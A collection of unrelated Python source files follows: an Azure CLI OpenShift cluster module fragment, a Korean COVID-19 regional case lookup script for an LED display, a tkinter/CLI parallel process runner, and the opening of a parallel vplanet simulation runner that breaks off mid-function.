"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None,
management_subnet_cidr=None,
private_cluster=None):
if vnet_peer is not None:
raise CLIError('Vnet peering is no longer supported during cluster creation.'
'Instead it is possible to edit vnet properties after cluster creation')
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
if bool(private_cluster) != bool(management_subnet_cidr is not None):
raise CLIError('Both --private-cluster and --management-subnet-cidr need to be supplied or neither.')
api_properties = OpenShiftAPIProperties(
private_api_server=bool(private_cluster)
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterMasterPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix,
api_properties=api_properties
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, management_subnet_cidr=management_subnet_cidr)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_update(cmd, client, resource_group_name, name, refresh_cluster=None, no_wait=False):
instance = client.get(resource_group_name, name)
if refresh_cluster:
instance.refresh_cluster = True
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
main.py
|
import json
import crawlKoreaData_All as crawl1
import crawlKoreaData_Gyeonggi as crawl2
import crawlKoreaData_Seoul as crawl3
import LED_Display as LMD
import threading
from datetime import date, timedelta
today = date.today()
a = str(today)
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
thread.setDaemon(True)
thread.start()
return
crawl1.run()
crawl2.run()
crawl3.run()
array_screen = [
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
# 지역별 확진자 수 검색 함수
def search_count(js_file,search_region,array):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
print(json_data[i]['확진자수'])
array[1][1] = 1
for x in range(16):
for y in range(32):
if array[x][y] == 1:
LMD.set_pixel(x,y,0)
# 지역별 전날대비 확진자 수 증감 검색 함수
def count_change(js_file,search_region):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
return json_data[i]['전날비교']
menu = 1
while(menu):
print("*****Menu*****")
print("1.All")
print("2.Seoul")
print("3.Gyeonggi")
print("4.Exit")
print("**************")
menu_choice = int(input("Select menu: "))
# while > 뒤로가기 입력전까지 menu 반복시행
while menu_choice == 1: # 전국 확진자 수 검색
js_file = "koreaRegionalData.js"
search_region = input("지역을 입력하세요 (ex:서울): ")
search_count(js_file,search_region)
if search_region == '0': # 0을 입력하면 메뉴로 복귀
break
while menu_choice == 2: # 서울 세부지역 확진자 수 검색
js_file = 'koreaData_Seoul_' + a + '.js'
search_region = input("지역을 입력하세요 (ex:종로구): ")
search_count(js_file,search_region,array_screen)
if search_region == '0': # 0을 입력하면 메뉴로 복귀
break
while menu_choice == 3: # 경기 세부지역 확진자 수 검색
js_file = "koreaData_Gyeonggi.js"
search_region = input("지역을 입력하세요 (ex:수원): ")
search_count(js_file,search_region)
print(str(count_change(js_file,search_region)),"명 증가")
if search_region == '0': # 0을 입력하면 메뉴로 복귀
break
if menu_choice == 4: # 메뉴 종료
menu = 0
|
parallel_proc_runner_base.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# https://github.com/cquickstad/parallel_proc_runner
# Copyright 2018 Chad Quickstad
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import sys
import os
import re
import uuid
import optparse
import webbrowser
import tkinter as tk
import tkinter.ttk as ttk
from tempfile import gettempdir
from enum import Enum
from time import sleep
from random import randint
class BaseJobRunner:
"""This base class that allows easy implementation of an application that can run parallel processes
with a choice between a GUI or command-line interface"""
def __init__(self, name):
self.name = name
# This object does not inherit from threading.Thread. Instead it uses threading.Thread as a member to run this
# object's run() method. This is because this object supports running multiple times, but threading.Thread can
# only run once. The member thread is created every time start() is called.
self.thread = None
self.start_gating_event = None
self.start_callback = self.dummy_method
self.stop_callback = self.dummy_method
self.stop_event = threading.Event()
# For polling instead of using callbacks
self.running = False
self.result = -1
self.output = ""
self.result_message = ""
self.setup_kwargs = dict()
def dummy_method(self, *args, **kwargs):
pass
def set_start_gating_event(self, start_gating_event):
self.start_gating_event = start_gating_event
def set_start_callback(self, start_callback):
self.start_callback = start_callback
def set_stop_callback(self, stop_callback):
self.stop_callback = stop_callback
def set_args(self, **kwargs):
self.setup_kwargs = kwargs
def start(self):
self.result = -1
self.output = ""
self.result_message = ""
if self.stop_event.is_set():
self.stop_event.clear()
self.thread = threading.Thread(name=self.name, target=self.run)
self.thread.start()
def run(self):
"""When start() is called, this run() method will be called in a new thread"""
self.running = False
if self.start_gating_event is not None:
self.start_gating_event.wait()
self.running = True
if self.start_callback is not None:
self.start_callback(self.name)
try:
self.result, self.output = self.job()
self.result_message = "Success" if self.result == 0 else "FAIL (" + str(self.result) + ")"
except Exception as e:
# Catch all exceptions in the child thread. This isn't generally a good idea, but we want exceptions to be
# reported to the parent thread.
self.result_message = "FAIL (Exception)"
self.output += "\n" + type(e).__name__ + ": " + str(e)
finally:
self.running = False
if self.stop_callback is not None:
self.stop_callback(self.name, self.result_message, self.output)
self.stop_event.set()
def job(self):
"""Child type should implement job() to do the task this runner is trying to accomplish.
The return value of job() and any output is passed to the result of the stop_callback.
Any arguments needed for input to job should be supplied by self.setup_kwargs by the set_args() method."""
result = 1
output = "Override this method"
return result, output
def terminate(self):
"""Child type may choose to implement this to kill the run()/job() thread."""
print("terminate() not implemented for", self.name)
class Cli:
""" The (C)ommand (L)ine (I)nterface part of the app, for when running with the GUI
is not desired."""
def __init__(self, runners):
self.runners = runners
for r in runners:
r.set_start_callback(self.call_when_runner_starts)
r.set_stop_callback(self.call_when_runner_stops)
self.result_info_list = list()
self.start_callback_sema = threading.BoundedSemaphore()
self.stop_callback_sema = threading.BoundedSemaphore()
def call_when_runner_starts(self, name):
with self.start_callback_sema:
print(name, "starting...")
def call_when_runner_stops(self, name, result_message, output):
with self.stop_callback_sema:
print(name, "finished.")
self.result_info_list.append((name, result_message, output))
def display_result_info(self):
max_len = 0
for name, result_message, output in self.result_info_list:
max_len = max(max_len, len(name), len(result_message))
output_lines = output.split("\n")
for line in output_lines:
max_len = max(max_len, len(line))
# Don't let max_len get too long
max_len = min(max_len, 200)
separator = ""
for i in range(0, max_len + 2): # + 2 to match leading "# "
separator += "#"
for name, result_message, output in self.result_info_list:
output_lines = output.split("\n")
print("\n\n")
print(separator)
print("#", name)
print(separator)
print("# Result:", result_message)
print(separator)
for line in output_lines:
print("#", line)
def get_exit_return_code(self):
failing_jobs = list()
for name, result_message, output in self.result_info_list:
if "Success" not in result_message:
failing_jobs.append(name)
print("\n\n")
failures_detected = len(failing_jobs) > 0
if failures_detected:
print("Failing jobs:")
for job in failing_jobs:
print(" ", job)
print("\n", str(len(failing_jobs)), "job(s) failed.")
else:
print("All tests passed")
if failures_detected:
sys.exit(1)
def run(self):
for r in self.runners:
print(r.name, "is waiting to start...")
r.start()
for r in self.runners:
r.stop_event.wait()
self.display_result_info()
sys.exit(self.get_exit_return_code())
class WidgetState(Enum):
INIT, WAITING, RUNNING, DONE = range(0, 4)
class GuiProcessWidget:
"""The part of GUI that represents one of the processes
"""
def __init__(self, master, name, runner, output_file_dir=""):
self.name = name
self.runner = runner
self.state = WidgetState.INIT
self.frame = tk.Frame(master, height=self.get_height(), width=self.get_width())
self.process_enable_var = tk.IntVar()
self.process_enable_var.set(1)
self.check_button = None
self.create_check_button()
self.status_label = None
self.progress_bar = None
self.terminate_button = None
self.open_output_button = None
if output_file_dir == "":
output_file_dir = gettempdir()
self.output_file_name = output_file_dir + "/" + str(uuid.uuid4()) + ".txt" # UUID is unique
def get_tk_widget(self):
return self.frame
@staticmethod
def get_height():
return 40
@staticmethod
def get_width():
return 400
def create_check_button(self):
self.check_button = tk.Checkbutton(self.frame, text=self.name, variable=self.process_enable_var)
if self.process_enable_var.get():
self.check_button.select()
else:
self.check_button.deselect()
self.check_button.grid(row=0, column=0, sticky=tk.NSEW)
def get_name(self):
return self.name
def select(self):
if self.check_button is not None:
self.check_button.select()
def deselect(self):
if self.check_button is not None:
self.check_button.deselect()
def toggle(self):
if self.check_button is not None:
self.check_button.toggle()
def make_status_label(self, text, **kwargs):
if self.status_label is not None:
self.status_label.destroy()
self.status_label = tk.Label(self.frame, text=text, **kwargs)
self.status_label.grid(row=0, column=0, sticky=tk.NSEW)
def poll_done(self):
if self.state == WidgetState.WAITING and self.runner.running:
self.state = WidgetState.RUNNING
self.transition_to_running()
elif (self.state == WidgetState.WAITING and self.runner.stop_event.is_set()) \
or (self.state == WidgetState.RUNNING and not self.runner.running):
self.state = WidgetState.DONE
self.transition_to_done()
return self.state == WidgetState.DONE
def create_terminate_button(self):
self.terminate_button = tk.Button(self.frame, text="Terminate", command=self.terminate_action)
self.terminate_button.grid(row=0, column=3, sticky=tk.NE)
def create_open_output_button(self):
self.open_output_button = tk.Button(self.frame, text="Open Output", command=self.open_output_action)
self.open_output_button.grid(row=0, column=1, sticky=tk.NE)
def transition_to_done(self):
self.destroy_progress_bar()
self.destroy_terminate_button()
text = self.name + ": " + self.runner.result_message
color = 'black'
if "FAIL" in self.runner.result_message:
color = 'red'
if "Success" in self.runner.result_message:
color = '#006400' # Dark Green
self.write_output_to_file(text + "\n" + self.runner.output)
self.make_status_label(text, fg=color)
self.create_open_output_button()
def transition_to_running(self):
text = self.name + ": Running..."
self.make_status_label(text)
self.create_and_animate_progress_bar()
self.create_terminate_button()
def create_and_animate_progress_bar(self):
self.progress_bar = ttk.Progressbar(self.frame, orient=tk.HORIZONTAL, mode="indeterminate")
self.progress_bar.grid(row=0, column=1, sticky=tk.NE)
self.progress_bar.start()
def transition_to_not_selected(self):
self.destroy_status_label()
self.destroy_progress_bar()
self.destroy_terminate_button()
self.destroy_open_output_button()
self.make_status_label(self.name + ": Not Selected")
def transition_to_waiting_to_start(self):
self.destroy_status_label()
self.destroy_progress_bar()
self.destroy_terminate_button()
self.destroy_open_output_button()
self.make_status_label(self.name + ": Waiting to start...")
self.runner.start()
def start(self):
started = False
self.check_button.destroy()
self.check_button = None
if self.process_enable_var.get():
started = True
self.state = WidgetState.WAITING
self.transition_to_waiting_to_start()
else:
self.state = WidgetState.DONE
self.transition_to_not_selected()
# self.runner.stop_event.
return started
def write_output_to_file(self, output):
with open(self.output_file_name, 'w') as output_file:
output_file.write(output)
def open_output_action(self):
webbrowser.open('file://' + self.output_file_name)
def terminate_action(self):
self.runner.terminate()
def reset(self):
self.state = WidgetState.INIT
self.destroy_checkbutton()
self.destroy_status_label()
self.destroy_progress_bar()
self.destroy_terminate_button()
self.destroy_open_output_button()
self.clean_up_files()
self.create_check_button()
def destroy_open_output_button(self):
if self.open_output_button is not None:
self.open_output_button.destroy()
self.open_output_button = None
def destroy_terminate_button(self):
if self.terminate_button is not None:
self.terminate_button.destroy()
self.terminate_button = None
def destroy_progress_bar(self):
if self.progress_bar is not None:
self.progress_bar.stop()
self.progress_bar.destroy()
self.progress_bar = None
def destroy_status_label(self):
if self.status_label is not None:
self.status_label.destroy()
self.status_label = None
def destroy_checkbutton(self):
if self.check_button is not None:
self.check_button.destroy()
self.check_button = None
def clean_up_files(self):
if os.path.isfile(self.output_file_name):
os.remove(self.output_file_name)
class Gui:
"""Main window of the GUI. Contains GuiProcessWidgets.
"""
def __init__(self, application_title, runners, output_file_dir=""):
self.application_title = application_title
self.runners = runners
self.root = Gui.build_root(application_title)
self.main_frame = Gui.build_main_frame(self.root)
self.filter_text_entry = None # Forward declare this before registering filter_text_update_callback
self.upper_controls_frame, \
self.select_all_button, \
self.select_none_button, \
self.select_inv_button, \
self.filter_text_string_var, \
self.filter_text_entry = Gui.build_upper_controls_frame(self.main_frame,
self.select_all, self.select_none, self.select_inv,
self.filter_text_update_callback)
num_procs_to_show = 15
self.process_canvas, \
self.h_bar, \
self.v_bar, \
self.process_widgets = Gui.build_process_canvas(self.main_frame,
GuiProcessWidget.get_width(),
GuiProcessWidget.get_height() * num_procs_to_show,
runners,
output_file_dir)
self.lower_controls_frame, \
self.exit_button, \
self.go_button = Gui.build_lower_controls_frame(self.main_frame, self.exit_action, self.go_action)
self.reset_button = None
self.root.protocol("WM_DELETE_WINDOW", self.wm_delete_window_action) # Covers Alt+F4
self.root.bind("<Control-q>", self.keyboard_exit_key_combination)
self.root.bind("<Escape>", self.keyboard_exit_key_combination)
self.root.bind("<Return>", self.keyboard_return_key)
self.root.bind("<Alt-o>", self.keyboard_alt_o_combination)
@staticmethod
def build_root(application_title):
root = tk.Tk()
root.title(application_title)
Gui.configure_expansion(root, 0, 0)
return root
@staticmethod
def build_main_frame(root):
main_frame = tk.Frame(root)
main_frame.grid(row=0, column=0, sticky=tk.NSEW)
Gui.configure_expansion(main_frame, 1, 0)
return main_frame
@staticmethod
def build_upper_controls_frame(master, select_all_method, select_none_method, select_inv_method,
filter_callback):
upr_ctl_frm = tk.Frame(master)
upr_ctl_frm.grid(row=0, column=0, columnspan=2, sticky=tk.NSEW)
Gui.configure_column_expansion(upr_ctl_frm, 0)
Gui.configure_column_expansion(upr_ctl_frm, 1)
Gui.configure_column_expansion(upr_ctl_frm, 2)
sel_all_btn = tk.Button(upr_ctl_frm, text="Select All", command=select_all_method)
sel_none_btn = tk.Button(upr_ctl_frm, text="Select None", command=select_none_method)
sel_inv_btn = tk.Button(upr_ctl_frm, text="Invert Selection", command=select_inv_method)
filter_str = tk.StringVar()
filter_str.trace("w", lambda name, index, mode, sv=filter_str: filter_callback(sv))
filter_entry = tk.Entry(upr_ctl_frm, textvariable=filter_str)
filter_entry.insert(0, "<filter selection (regex)>")
Gui.place_in_expandable_cell(sel_all_btn, 0, 0)
Gui.place_in_expandable_cell(sel_none_btn, 0, 1)
Gui.place_in_expandable_cell(sel_inv_btn, 0, 2)
filter_entry.grid(row=1, column=0, columnspan=3, sticky=tk.NSEW)
return upr_ctl_frm, sel_all_btn, sel_none_btn, sel_inv_btn, filter_str, filter_entry
@staticmethod
def build_process_canvas(master, canvas_width, canvas_height, runners, output_file_dir):
process_canvas = tk.Canvas(master, width=canvas_width, height=canvas_height)
h_bar = tk.Scrollbar(master, orient=tk.HORIZONTAL, command=process_canvas.xview)
h_bar.grid(row=2, column=0, sticky=tk.EW)
v_bar = tk.Scrollbar(master, orient=tk.VERTICAL, command=process_canvas.yview)
v_bar.grid(row=1, column=1, sticky=tk.NS)
process_canvas.config(xscrollcommand=h_bar.set, yscrollcommand=v_bar.set)
# process_canvas.bind_all("<MouseWheel>", ...)
process_canvas.bind_all("<Button-4>", lambda event: process_canvas.yview_scroll(-1, "units"))
process_canvas.bind_all("<Button-5>", lambda event: process_canvas.yview_scroll(1, "units"))
canvas_width = 0
canvas_height = 0
process_widgets = list()
for i, r in enumerate(runners):
pw = GuiProcessWidget(process_canvas, r.name, r, output_file_dir)
process_widgets.append(pw)
pos_x = 0
pos_y = pw.get_height() * i
canvas_height += pw.get_height()
canvas_width = pw.get_width()
process_canvas.create_window(pos_x, pos_y, anchor=tk.NW, window=pw.get_tk_widget())
process_canvas.config(scrollregion=(0, 0, canvas_width, canvas_height))
Gui.place_in_expandable_cell(process_canvas, 1, 0)
return process_canvas, h_bar, v_bar, process_widgets
@staticmethod
def build_lower_controls_frame(master, exit_action, go_action):
lower_controls_frame = tk.Frame(master)
lower_controls_frame.grid(row=3, column=0, columnspan=2, sticky=tk.NSEW)
Gui.configure_column_expansion(lower_controls_frame, 0)
Gui.configure_column_expansion(lower_controls_frame, 1)
exit_button = tk.Button(lower_controls_frame, text="Exit", command=exit_action)
Gui.place_in_expandable_cell(exit_button, 0, 0)
go_button = Gui.build_go_button(lower_controls_frame, go_action)
return lower_controls_frame, exit_button, go_button
@staticmethod
def build_go_button(master, go_action):
b = tk.Button(master, text="Go", command=go_action)
Gui.place_in_expandable_cell(b, 0, 1)
return b
@staticmethod
def build_reset_button(master, reset_action):
b = tk.Button(master, text="Reset", command=reset_action)
Gui.place_in_expandable_cell(b, 0, 1)
return b
@staticmethod
def place_in_expandable_cell(thing, row, col):
thing.grid(row=row, column=col, sticky=tk.NSEW)
@staticmethod
def configure_expansion(thing, row, column):
Gui.configure_column_expansion(thing, column)
Gui.configure_row_expansion(thing, row)
@staticmethod
def configure_row_expansion(thing, row):
tk.Grid.rowconfigure(thing, row, weight=1)
@staticmethod
def configure_column_expansion(thing, column):
tk.Grid.columnconfigure(thing, column, weight=1)
def select_all(self):
for p in self.process_widgets:
p.select()
def select_none(self):
for p in self.process_widgets:
p.deselect()
def select_inv(self):
for p in self.process_widgets:
p.toggle()
def filter_text_update_callback(self, sv):
regex = sv.get()
try:
pattern = re.compile(regex)
if self.filter_text_entry is not None:
self.filter_text_entry.config(bg='white')
for p in self.process_widgets:
if pattern.search(p.get_name()):
p.select()
else:
p.deselect()
except Exception:
if self.filter_text_entry is not None:
self.filter_text_entry.config(bg='red')
def exit_action(self):
for p in self.process_widgets:
p.terminate_action()
self.clean_up_files()
self.main_frame.quit()
def go_action(self):
self.go_button.config(state=tk.DISABLED)
num_started = 0
for p in self.process_widgets:
if p.start():
num_started += 1
if num_started > 0:
self.root.after(250, self.process_widget_polling_loop)
else:
self.change_go_button_to_reset_button()
def process_widget_polling_loop(self):
if self.poll_all_widgets_done():
self.all_widgets_done_action()
else:
self.root.after(250, self.process_widget_polling_loop)
def poll_all_widgets_done(self):
all_done = True # Starts True because of the 'and' in the loop
for i, p in enumerate(self.process_widgets):
d = p.poll_done()
all_done = all_done and d
return all_done
def reset_action(self):
for p in self.process_widgets:
p.reset()
self.reset_button.destroy()
self.reset_button = None
self.go_button = Gui.build_go_button(self.lower_controls_frame, self.go_action)
def all_widgets_done_action(self):
if self.go_button is not None:
self.change_go_button_to_reset_button()
def change_go_button_to_reset_button(self):
self.go_button.destroy()
self.go_button = None
self.reset_button = Gui.build_reset_button(self.lower_controls_frame, self.reset_action)
def run(self):
self.root.mainloop()
def keyboard_exit_key_combination(self, event):
self.clean_up_files()
self.root.destroy()
def keyboard_return_key(self, event):
if self.go_button is not None:
self.go_action()
if self.reset_button is not None:
self.reset_action()
def keyboard_alt_o_combination(self, event):
for w in self.process_widgets:
if w.open_output_button is not None:
w.open_output_action()
break
def wm_delete_window_action(self):
"""Callback for when the "X" is clicked to close the window"""
self.clean_up_files() # Insert this behavior
self.root.destroy() # Continue with original behavior
def clean_up_files(self):
for p in self.process_widgets:
p.clean_up_files()
class ParallelProcRunnerAppBase:
"""A base class for the Parallel Process Runner app.
Selects between the GUI or CLI."""
def __init__(self, name, usage=None, output_file_dir=""):
self.name = name
self.output_file_dir = output_file_dir
self.opt_parser = optparse.OptionParser(usage=usage)
self.configure_default_options(self.opt_parser)
self.configure_custom_options(self.opt_parser)
(self.options, self.args) = self.opt_parser.parse_args()
def configure_default_options(self, parser):
parser.add_option("-c", "--cli", dest='gui', action='store_false',
help="use the CLI (command-line-interface), not the GUI.")
parser.add_option("-g", "--gui", dest='gui', action='store_true', default=True,
help="use the GUI (graphical-user-interface), not the CLI")
def configure_custom_options(self, parser):
"""Child may extend this"""
pass
def get_runners(self):
"""Child must implement to return an iterable containing objects that inherit from BaseJobRunner"""
return list()
def run(self):
if self.options.gui:
gui = Gui(self.name, self.get_runners(), self.output_file_dir)
gui.run()
else:
cli = Cli(self.get_runners())
cli.run()
class DummyRunner(BaseJobRunner):
"""For testing the BaseJobRunner.
"""
def __init__(self, name):
super().__init__(name)
self.job_ran = False
self.terminated = False
self.job_result = -1
def job(self):
self.terminated = False
self.job_ran = False
self.setup_kwargs['job_mocking_event'].wait()
self.job_ran = True
if self.terminated:
self.terminated = False
return 255, "Job was terminated by user"
return self.job_result, "Output from " + self.name
def set_result(self, result):
self.job_result = result
def terminate(self):
self.setup_kwargs['job_mocking_event'].set()
self.terminated = True
class ExampleApp(ParallelProcRunnerAppBase):
"""For testing and demonstrating ParallelProcRunnerApp
"""
def __init__(self):
super().__init__("Test for ParallelProcRunner")
def get_runners(self):
runners = list()
for i in range(0, 5):
result = i % 2
will_fail = result != 0
name = "Process " + str(i)
if will_fail:
name += " (will fail)"
else:
name += " (will pass)"
r = DummyRunner(name)
runners.append(r)
# r.set_start_gating_event(None if i == 0 else runners[i-1].stop_event)
r.set_result(result)
class DummyEvent:
def __init__(self):
self.flag = False
def set(self):
self.flag = True
def wait(self):
i = 0
timeout = randint(5, 10)
while not self.flag and i < timeout:
sleep(1)
i += 1
self.flag = False
dummy = DummyEvent()
r.set_args(job_mocking_event=dummy)
if i > 0:
r.set_start_gating_event(runners[0].stop_event)
return runners
if __name__ == '__main__':
"""For testing"""
app = ExampleApp()
app.run()
|
multi-planet.py
|
import os
import multiprocessing as mp
import sys
import subprocess as sub
import mmap
import argparse
import h5py
import numpy as np
from bigplanet import CreateHDF5,merge_data,load,save,CreateMasterHDF5
from collections import OrderedDict
# --------------------------------------------------------------------
## parallel implementation of running vplanet over a directory ##
def parallel_run_planet(input_file, cores, quiet, bigplanet,email):
# gets the folder name with all the sims
folder_name, infiles = GetDir(input_file)
#gets the list of sims
sims = sorted([f.path for f in os.scandir(folder_name) if f.is_dir()])
#initalizes the checkpoint file
checkpoint_file = os.getcwd() + '/' + '.' + folder_name
#checks if the files doesn't exist and if so then it creates it
if os.path.isfile(checkpoint_file) == False:
CreateCP(checkpoint_file,input_file,quiet,sims)
#if it does exist, it checks for any 0's (sims that didn't complete) and
#changes them to -1 to be re-ran
else:
ReCreateCP(checkpoint_file,input_file,quiet,sims)
#get logfile name
path_vpl = os.path.join(sims[0],'vpl.in')
with open(path_vpl, 'r') as vpl:
content = [line.strip().split() for line in vpl.readlines()]
for line in content:
if line:
if line[0] == 'sSystemName':
system_name = line[1]
logfile = system_name + ".log"
lock = mp.Lock()
workers = []
for i in range(cores):
workers.append(mp.Process(target=par_worker, args=(checkpoint_file,infiles,system_name,logfile,quiet,bigplanet,lock)))
for w in workers:
w.start()
for w in workers:
w.join()
if bigplanet == True:
CreateMasterHDF5(folder_name,sims)
if email is not None:
SendMail(email, folder_name)
def SendMail(email,destfolder):
Title = "Multi-Planet has finished for " + destfolder
Body = "Please log into your computer to verify the results. This is an auto-generated message."
